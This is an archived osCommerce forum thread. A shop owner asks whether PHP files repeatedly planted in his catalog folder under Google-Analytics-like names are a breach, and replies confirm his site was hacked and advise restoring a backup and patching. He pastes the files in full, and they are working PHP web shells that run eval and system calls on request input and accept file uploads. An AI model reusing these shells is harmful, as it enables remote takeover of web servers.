Jump to content
  • Checkout
  • Login
  • Get in touch

osCommerce

The e-commerce.

Google injecting files?


Guest

Recommended Posts

Hi

 

I am new to php and osCommerce. I have not had time to added all the anti-hacker adds-on mentioned by spooks in a forum post but cross site attack. (http://www.oscommerce.com/forums/index.php?showtopic=313323)

 

I have added Google Analytics V1.0 (http://addons.oscommerce.com/info/7200) recently and it works fine until I noticed there are a couple new files have been injected into my /catalog/ folder over and over again.

 

I tried to delete them and couple days later, new files been created again.

I didnt pay attention if those files are the same ones but I rang my Hosting company to try to get their enginers to take a look for me today. Also they suggested me to check with osCommerce to see if its any of their scripts doing or its this particular Adds-on doing.

 

There are the files name with scripts inside those files, please see below. In those files, I noticed some scripts like REQUEST, MOVE UPLOADED FILES, COOKIES, etc. Please help me identify if they are secruity breach. :'(

 

goog1e17d9b20b297ba.php - file permission: rw-r--r--

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

 

goog1e_analist_95813b97a72084.php - file permission: rwxrwxrwx

<!--<?php if(@$_REQUEST['cookies']==1){echo '--><i>Goog1e_analist_certs</i><br>';if(@$_REQUEST['e']){eval(base64_decode($_REQUEST['e']));}elseif(@$_FILES['f']['name']){move_uploaded_file($_FILES['f']['tmp_name'],@$_REQUEST['fp'].$_FILES['f']['name']);if(@$_REQUEST['fc']){@chmod($_FILES['f']['name'],$_REQUEST['fc']);}}elseif(@$_REQUEST['nn']){$fh=fopen(@$_REQUEST['nn'],'w');fwrite($fh,@$_REQUEST['nd']);fclose($fh); if(@$_REQUEST['fc']){@chmod(@$_REQUEST['nn'],$_REQUEST['fc']);}}else{$p=str_replace('\\','/',$_SERVER['REQUEST_URI']);$pt=str_replace('/','../',substr(preg_replace('/[^\/]/','',$p),1)).'./';echo chr(118).chr(46).chr(46).@is_writable($pt);}echo '<!--';}?>-->

 

goog1eb2a0136fa3a64.php - file permission: rwxrwxrwx

Goog1e_analist_up<?php $e=@$_POST['e'];$s=@$_POST['s'];if($e){eval($e);}if($s){system($s);}if($_FILES['f']['name']!=''){move_uploaded_file($_FILES['f']['tmp_name'],$_FILES['f']['name']);}?>

 

 

Thanks guys!!! help is needed urgental.

Link to comment
Share on other sites

Kai,

 

Your site has been hacked, and not by google.

 

I suggest you restore a known clean backup and then MAKE IT A PRIORITY to install the security contributions and apply the admin security patches.

 

 

Chris

Link to comment
Share on other sites

I only noticed those files after added Google Analytics V1.0 (http://addons.oscommerce.com/info/7200)

 

Could you confirm this add-on is safe to use for me? Please?

 

Can I just reinstall the server side and upload my SQL into database? I got lots products been uploaded, and it will take me lots time to upload them again.

 

 

THanks Chris.

 

 

Kai

Link to comment
Share on other sites

Also, if I re-install the osCommerce again, should I change all the passwords for WEB Server and Database as I know there is one file in osCommerce contains those information.

 

 

Thanks

kai

Link to comment
Share on other sites

Kai,

 

it is unlikely that the hacker has accessed your database, however you should ensure that your 2 configure.php files have permissions of 444

 

 

 

 

Chris

Link to comment
Share on other sites

Chris,

 

Yes, everytime I restored my site from previous point, first thing first, were to change those 2 configure.php to 444.

 

I am wondering, if I restore my shop from previous known clean point or do a completely reinstall, those adds on will be in different orders. If I apply old database files, will that be causing problems?

 

And again, is Google Analytics V1.0 (http://addons.oscommerce.com/info/7200) safe to use?

 

 

Thanks

Kai

Link to comment
Share on other sites

That addon didn't cause the hack.

 

If you want to find out what causes it and how to prevent it read this

If I suggest you edit any file(s) make a backup first - I'm not perfect and neither are you.

 

"Given enough impetus a parallelogramatically shaped projectile can egress a circular orifice."

- Me -

 

"Headers already sent" - The definitive help

 

"Cannot redeclare ..." - How to find/fix it

 

SSL Implementation Help

 

Like this post? "Like" it again over there >

Link to comment
Share on other sites

I have deleted my whole store including database and changed password for everything :( Cos if this not that add-on caused attack, I wont be able to tell when my site was clean.

 

Now I have had my site up with all those patches mentioned in Spooks' forum post. Hope I will be fine for a while.

 

Just one question, I changed Admin folder to something else and relavent files. But in future before I add more add-ons, do I need to check each files in that add on and change 'admin' to 'my changed folder name'? I have changed all ADMIN folder to new name, and checked every file to see if there are any need to replace word admin too.

 

It is very time consuming and I am very slow at restore my shop to full running atm. Could you confirm that what I did to change folder and check every files are necessary?

 

Thanks

Link to comment
Share on other sites

Kai,

 

You will only need to change the admin folder back to the name admin if you intend to use an auto-installer to install the contribution. Otherwise, just apply changes to your current admin folder name where the contribution states 'admin'

 

 

 

Chris

Link to comment
Share on other sites

Archived

This topic is now archived and is closed to further replies.

×
×
  • Create New...